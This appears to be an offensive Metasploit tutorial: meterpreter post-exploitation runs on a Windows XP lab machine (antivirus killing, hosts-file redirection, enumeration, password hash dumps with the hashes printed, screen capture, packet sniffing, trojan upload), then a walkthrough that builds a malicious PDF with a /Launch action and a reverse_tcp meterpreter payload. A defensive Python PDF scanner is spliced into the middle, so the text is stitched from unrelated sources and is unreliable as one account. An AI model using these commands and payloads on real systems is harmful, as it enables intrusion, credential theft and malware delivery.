meterpreter > run checkvm
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine

meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection 6 firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*]
[*] Checking DEP Support Policy...

meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
OPTIONS:
 -e Enable RDP only.
 -h Help menu.
 -p The Password of the user to add.
 -u The Username of the user to add.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary

meterpreter > run gettelnet
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u -p
OPTIONS:
 -e Enable Telnet Server only.
 -h Help menu.
 -p The Password of the user to add.
 -u The Username of the user to add.
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*] The Telnet Server Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...

meterpreter > run get_local_subnets
Local subnet: 10.211.55.0/255.255.255.0

meterpreter > run hostsedit
OPTIONS:
 -e Host entry in the format of IP,Hostname.
 -h Help Options.
 -l Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt
meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
[*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
[*] Clearing the DNS Cache
meterpreter > run remotewinenum
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target environment given a username and password or using the credential under witch Meterpreter is running using WMI wmic windows native tool.
Usage:
OPTIONS:
 -h Help menu.
 -p Password of user on target system
 -t The target address
 -u User on the target system (If not provided it will use credential of process)
meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
[*] Saving report to /root/.msf3/logs/remotewinenum/10.211.55.128_20090711.0142
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
The 'winenum' script is a very detailed Windows enumeration tool. It dumps files, hashes and much more.

meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 10.211.55.128:4444...
[*] Saving report to /root/.msf3/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
[*] running command net accounts /domain
[*] running command net session
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net localgroup administrators
[*] running command net group administrators
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] running command tasklist /m
[*] running command gpresult /SCOPE COMPUTER /Z
[*] running command gpresult /SCOPE USER /Z
[*] Running WMIC Commands ....
[*] running command wmic computersystem list brief
[*] running command wmic useraccount list
[*] running command wmic group list
[*] running command wmic service list brief
[*] running command wmic volume list brief
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic netclient list brief
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic share get name,path
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic process list brief
[*] running command wmic startup list full
[*] running command wmic rdtoggle list
[*] running command wmic product get name,version
[*] running command wmic qfe
[*] Extracting software list from registry
[*] Finished Extraction of software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!

meterpreter > run scraper
[*] New session on 10.211.55.128:4444...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...

meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...

meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >
meterpreter > getdesktop
Session 0\WinSta0\Default

meterpreter > use espia
Loading extension espia...success.

meterpreter > screengrab
Screenshot saved to: C:/Archivos de programa/Rapid7/framework/msf3/EetdCkva.jpeg

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > sniffer_interfaces
1 - 'Adaptador Ethernet PCI AMD PCNET Family' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
packets: 2
bytes: 329

meterpreter > sniffer_dump 1 target.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 2 packets (369 bytes)
[*] Downloaded 100% (369/369)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to target.pcap

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are packets ( bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter >
windows/fileformat/adobe_pdf_embedded_exe
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
OUTPUTPATH ./data/exploits/ no The location to output the file.
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
C:\Archivos de programa\Metasploit\Framework3\msf3\modules\exploits\windows\fileformat\
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEPATH%\\\\Mis documentos\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Mis documentos\"))&(if exist \"%HOMEPATH%\\\\Escritorio\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Escritorio\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Mis documentos\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"Mis documentos\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Escritorio\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Escritorio))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English, Español (modified by July & L00PeR))', { 'Ret' => '' } ]
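The two module lines above build a PDF /Launch action: an action dictionary whose /Win entry names cmd.exe as /F, a working directory as /D, and a /P parameter string that renames the PDF to .exe and starts it. From the defender's side the useful point is that this object is plain text in the file and can be found before Reader ever opens it. The following scanner is an added example, not code from the page or from the Metasploit module: it walks the indirect objects of an uncompressed PDF, reports every /Launch action, decodes the /F, /D and /P literal strings (PDF backslash escapes and nested parentheses, which the /P string above relies on), and marks whether the catalog's /OpenAction points at the action so that it fires on open. SAMPLE_PDF is constructed for the demonstration and uses placeholder names (report.pdf); the function and regex names are mine.

```python
import re

# A top-level indirect object: "N G obj ... endobj" (non-greedy, so streams
# that happen to contain "obj" do not swallow the following objects).
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
# An action dictionary of subtype Launch; whitespace between tokens is optional,
# and the module above emits none.
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
# Catalog entry that makes an action run as soon as the document is opened.
OPENACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")


def _pdf_string(body, key):
    """Return the literal string value written as /key( ... ) in body, or None.

    Handles balanced nested parentheses and keeps the character following a
    backslash verbatim (enough for the \\\\ and \\" escapes the module emits;
    octal and newline escapes are not decoded in this demo).
    """
    m = re.search(rb"/" + key + rb"\s*\(", body)
    if not m:
        return None
    i, depth, out = m.end(), 1, bytearray()
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\":                 # escape: take next byte literally
            out += body[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:             # closing paren of the outer string
                break
        out += c
        i += 1
    return bytes(out)


def find_launch_actions(pdf_bytes):
    """List every /Launch action object in an uncompressed PDF.

    Each finding records the object number, the decoded /F, /D and /P
    strings, and whether the catalog's /OpenAction triggers it automatically.
    """
    auto_open = {int(n) for n in OPENACTION_RE.findall(pdf_bytes)}
    findings = []
    for m in OBJ_RE.finditer(pdf_bytes):
        num, body = int(m.group(1)), m.group(3)
        if not LAUNCH_RE.search(body):
            continue
        findings.append({
            "object": num,
            "file": _pdf_string(body, b"F"),
            "dir": _pdf_string(body, b"D"),
            "params": _pdf_string(body, b"P"),
            "auto_open": num in auto_open,
        })
    return findings


# Constructed minimal PDF (not a real sample) whose object 5 mirrors the
# structure of the /Launch object the module writes, with placeholder names.
SAMPLE_PDF = (
    b"%PDF-1.4\r"
    b"1 0 obj\r<</Type/Catalog/Pages 2 0 R/OpenAction 5 0 R>>\rendobj\r"
    b"2 0 obj\r<</Type/Pages/Kids[3 0 R]/Count 1>>\rendobj\r"
    b"3 0 obj\r<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>\rendobj\r"
    b"4 0 obj\r<</Length 0>>\rstream\r\rendstream\rendobj\r"
    b"5 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)"
    b"/P(/Q /C (if exist \"%HOMEPATH%\\\\Desktop\\\\report.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))"
    b"&&(ren report.pdf report.exe&start report.exe))>>>>\rendobj\r"
    b"trailer\r<</Root 1 0 R>>\r%%EOF"
)

if __name__ == "__main__":
    for f in find_launch_actions(SAMPLE_PDF):
        print(f"obj {f['object']}: launches {f['file']!r} in {f['dir']!r}"
              f" (auto_open={f['auto_open']})\n  params: {f['params']!r}")
```

The scanner only sees objects stored in clear text; a document that wraps the action in an object stream or filtered stream needs the stream decoded first (pdf-parser-style tooling does this), so treat an empty result on a compressed file as "not checked" rather than "clean". On the detection side, the same /Launch plus /OpenAction combination is what a mail gateway or sandbox rule should key on, and Reader's own "Allow opening of non-PDF file attachments" preference controls whether the action runs at all.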
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated -2895 days ago (2009.12.23)
msf > search adobe_pdf_embedded_exe
[*] Searching loaded modules for pattern 'adobe_pdf_embedded_exe'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/fileformat/adobe_pdf_embedded_exe excellent Adobe PDF Embedded EXE Social Engineering
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
OUTPUTPATH ./data/exploits/ no The location to output the file.
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English, Español (modified by July & L00PeR))

msf exploit(adobe_pdf_embedded_exe) > set INFILENAME C:\\hackxcrack.pdf
INFILENAME => C:\hackxcrack.pdf
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set Lhost 192.168.1.100
Lhost => 192.168.1.100
msf exploit(adobe_pdf_embedded_exe) > set id 0
id => 0
msf exploit(adobe_pdf_embedded_exe) > exploit
use exploit/windows/fileformat/adobe_pdf_embedded_exe [The exploit that runs the PAYLOAD when a PDF is opened]
set FILENAME nombre_salida.pdf [The name the PDF will have once msf has modified it]
set INFILENAME /root/nombre_entrada.pdf [The name of the PDF that will be infected]
set OUTPUTPATH /root/ [Directory where the PDF will be saved]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP that will be listening for the PAYLOAD to connect back to]
set LPORT 4444 [Listening port]
set id 0 [The OS and the Adobe Reader version the exploit targets]
exploit
[*] Started reverse handler on port 4444
[*] Reading in 'C:\hackxcrack.pdf'...
[*] Parsing 'C:\hackxcrack.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /msf3/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >
meterpreter > upload C:\\evil.pdf C:\\
[*] uploading : C:\evil.pdf -> C:\
[*] uploaded : C:\evil.pdf -> C:\\evil.pdf
meterpreter > shell
Process 1140 created.
Channel 2 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd..
cd..
C:\WINDOWS>cd..
cd..
C:\>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: 84FF-4018
 Directorio de C:\
08/01/2002 13:21 <DIR> Archivos de programa
08/03/2012 02:05 0 AUTOEXEC.BAT
08/03/2012 02:05 0 CONFIG.SYS
08/01/2002 13:20 <DIR> Documents and Settings
17/01/2002 20:04 453.609 evil.pdf
08/01/2002 15:45 0 kbs.txt
08/01/2002 15:57 <DIR> WINDOWS
 4 archivos 453.609 bytes
 3 dirs 9.114.456.064 bytes libres
C:\>start evil.pdf
start evil.pdf
C:\>exit
meterpreter >

Very well, we're done. Be careful with the antivirus; on the remote PC a little save prompt pops up, which many people don't know how to get past, and we connect without any problems.